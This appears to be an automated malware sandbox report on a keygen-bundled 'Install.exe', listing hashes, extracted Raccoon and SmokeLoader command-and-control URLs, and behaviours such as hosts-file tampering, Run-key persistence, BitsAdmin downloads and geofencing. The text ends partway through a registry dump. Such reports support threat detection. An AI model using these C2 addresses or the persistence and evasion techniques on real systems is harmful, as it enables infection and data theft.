Overview
overview
10Static
static
ﱞﱞﱞ�...ﱞﱞ
windows10_x64
1ﱞﱞﱞ�...ﱞﱞ
windows10_x64
10ﱞﱞﱞ�...ﱞﱞ
windows10_x64
10ﱞﱞﱞ�...ﱞﱞ
windows10_x64
10ﱞﱞﱞ�...ﱞﱞ
windows7_x64
1ﱞﱞﱞ�...ﱞﱞ
windows7_x64
ﱞﱞﱞ�...ﱞﱞ
windows7_x64
ﱞﱞﱞ�...ﱞﱞ
windows7_x64
win102
windows10_x64
1win102
windows10_x64
10win102
windows10_x64
win102
windows10_x64
win104
windows10_x64
1win104
windows10_x64
win104
windows10_x64
10win104
windows10_x64
10win106
windows10_x64
1win106
windows10_x64
win106
windows10_x64
10win106
windows10_x64
10win103
windows10_x64
1win103
windows10_x64
10win103
windows10_x64
10win103
windows10_x64
10win101
windows10_x64
1win101
windows10_x64
win101
windows10_x64
10win101
windows10_x64
10win100
windows10_x64
1win100
windows10_x64
10win100
windows10_x64
10win100
windows10_x64
Resubmissions
25-04-2021 09:42
210425-v9mttlcxke 1025-04-2021 08:59
210425-1d89vxfyln 1025-04-2021 07:37
210425-b8smdccdwe 1025-04-2021 06:55
210425-1csfnkw57n 1024-04-2021 20:32
210424-x7kp9rrf4x 10Analysis
-
max time kernel
19s -
max time network
112s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
25-04-2021 06:55
Static task
static1
Behavioral task
behavioral1
Sample
Install — копия.exe
Resource
win10v20210408
Behavioral task
behavioral2
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
keygen-step-4 — копия.exe
Resource
win10v20210408
Behavioral task
behavioral4
Sample
keygen-step-4.exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
Install — копия.exe
Resource
win7v20210408
Behavioral task
behavioral6
Sample
Install.exe
Resource
win7v20210410
Behavioral task
behavioral7
Sample
keygen-step-4 — копия.exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
keygen-step-4.exe
Resource
win7v20210408
Behavioral task
behavioral9
Sample
Install — копия.exe
Resource
win10v20210410
Behavioral task
behavioral10
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral11
Sample
keygen-step-4 — копия.exe
Resource
win10v20210410
Behavioral task
behavioral12
Sample
keygen-step-4.exe
Resource
win10v20210408
Behavioral task
behavioral13
Sample
Install — копия.exe
Resource
win10v20210410
Behavioral task
behavioral14
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
keygen-step-4 — копия.exe
Resource
win10v20210408
Behavioral task
behavioral16
Sample
keygen-step-4.exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
Install — копия.exe
Resource
win10v20210408
Behavioral task
behavioral18
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral19
Sample
keygen-step-4 — копия.exe
Resource
win10v20210408
Behavioral task
behavioral20
Sample
keygen-step-4.exe
Resource
win10v20210410
Behavioral task
behavioral21
Sample
Install — копия.exe
Resource
win10v20210410
Behavioral task
behavioral22
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
keygen-step-4 — копия.exe
Resource
win10v20210410
Behavioral task
behavioral24
Sample
keygen-step-4.exe
Resource
win10v20210408
Behavioral task
behavioral25
Sample
Install — копия.exe
Resource
win10v20210410
Behavioral task
behavioral26
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral27
Sample
keygen-step-4 — копия.exe
Resource
win10v20210410
Behavioral task
behavioral28
Sample
keygen-step-4.exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
Install — копия.exe
Resource
win10v20210408
Behavioral task
behavioral30
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral31
Sample
keygen-step-4 — копия.exe
Resource
win10v20210408
Behavioral task
behavioral32
Sample
keygen-step-4.exe
Resource
win10v20210410
Errors
General
-
Target
Install.exe
-
Size
497KB
-
MD5
41a5f4fd1ea7cac4aa94a87aebccfef0
-
SHA1
0d0abf079413a4c773754bf4fda338dc5b9a8ddc
-
SHA256
97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9
-
SHA512
5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f
Malware Config
Extracted
raccoon
9afb493c6f82d08075dbbfa7d93ce97f1dbf4733
-
url4cnc
https://tttttt.me/antitantief3
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
http://al-commandoz.com/upload/
http://antalya-belek.com/upload/
http://luxurysv.com/upload/
http://massagespijkenisse.com/upload/
http://rexgorellhondaevent.com/upload/
Signatures
-
Glupteba Payload 2 IoCs
resource yara_rule behavioral14/memory/6008-312-0x0000000002E00000-0x000000000370B000-memory.dmp family_glupteba behavioral14/memory/6008-313-0x0000000000400000-0x0000000000D25000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Nirsoft 2 IoCs
resource yara_rule behavioral14/files/0x000300000001ad86-329.dat Nirsoft behavioral14/files/0x000300000001ad86-330.dat Nirsoft -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts Ultra.exe -
Executes dropped EXE 9 IoCs
pid Process 2044 Install.tmp 3772 Ultra.exe 3808 ultramediaburner.exe 3832 ultramediaburner.tmp 1236 UltraMediaBurner.exe 2116 Rumukerije.exe 1528 Gudajetaru.exe 4684 instEU.exe 4600 google-game.exe -
Modifies Windows Firewall 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Rumukerije.exe -
Loads dropped DLL 2 IoCs
pid Process 2044 Install.tmp 4780 rundll32.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 5304 icacls.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Torovubaeqae.exe\"" Ultra.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 160 ip-api.com 185 api.myip.com 186 api.myip.com 256 api.2ip.ua 257 api.2ip.ua -
Drops file in Program Files directory 12 IoCs
description ioc Process File created C:\Program Files (x86)\Windows Photo Viewer\Torovubaeqae.exe Ultra.exe File created C:\Program Files (x86)\Windows Photo Viewer\Torovubaeqae.exe.config Ultra.exe File created C:\Program Files\install.dat google-game.exe File created C:\Program Files\install.dll google-game.exe File created C:\Program Files\Mozilla Firefox\NWJBEIFHIK\ultramediaburner.exe Ultra.exe File created C:\Program Files\Mozilla Firefox\NWJBEIFHIK\ultramediaburner.exe.config Ultra.exe File created C:\Program Files (x86)\UltraMediaBurner\is-KK237.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files\libEGL.dll google-game.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-B2SEN.tmp ultramediaburner.tmp -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 2 IoCs
resource yara_rule behavioral14/files/0x000100000001ac84-245.dat nsis_installer_2 behavioral14/files/0x000100000001ac84-246.dat nsis_installer_2 -
Delays execution with timeout.exe 1 IoCs
pid Process 6076 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 5988 bitsadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 5896 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{80FE12E4-2B22-49F4-8344-F84444E96E51} = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 010000006f35e89b777aec7a59874acfa0cc5ff4e7b841fb1bc026ae7446078160df263f96903434fc08b60bd1fb6152090f5f03e410ca5c5659d5db2e9b1f0bcd804d45cbcc999084f4f88e3f59c15105db120b0bf11fdd4535677776cd MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionIn = "{163AA767-C6AB-4B79-8CA5-48AE7B16DD15}" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164C = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 01000000e1cce51421fc8332e72bf36b9a6bb8d2f14360c7e6e6f107167a51de304ce57732317266de6e61f638f2194fe7b44298ee88b93068b86d7d0826b0c92be84db8867e5ef0d626b67cf2ea9b34ec6ad5cce886fa02455e376c5653b9bccc00edd65b5545113d43957d1ab4fa7bb2ad8ab6adddc133bcf9bc8c8fa175bd16b6572e8154b96840e5ebfd03ef1293ba9dba6b952d1aa004aa92f4deb0878cf9287f7ee81c4dc5462ca882d03ac8a7f45ae7a74e164e81098f4cb2ec2097d062786761664ea7a4fd3707966437e27fac044c7524389773d2c91cb92a92184e9fc4d8a588889e40da28919cb984899297bb04a60c33a40edc78261f2fa46935362e066c216cfa2e601ed0f8a3c33d52ae9f711c45a76a0a1ebdcda778f7507ac9d41115a798cc8e4139547e2c9330a881d0a4e07034caf31fb6c0a21e2b9c3f25d80e06cead47c7cd98f23a80939ca78b6e2d0f667a5478e0848c15d5e0a853bd580b367f4c82d6f75d7e85d665935289999b8b881842379947523cbdb6bdb62476a290b213a130f5a74c6620a80d688771678cd7b0242b4a203050b00bbb50b41edc655fd5fd097bf2 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 301bd569d72dd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EL1681II-FO1F-AN2G-81K3-DNI5R86H5R6K} rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{TV2553ZI-PZ3Y-VP7M-68Y0-MJT9X67Z6U7M} rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QJ2559JN-BF7A-LM2A-20M4-JBF9M43Q7G3S} svchost.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local 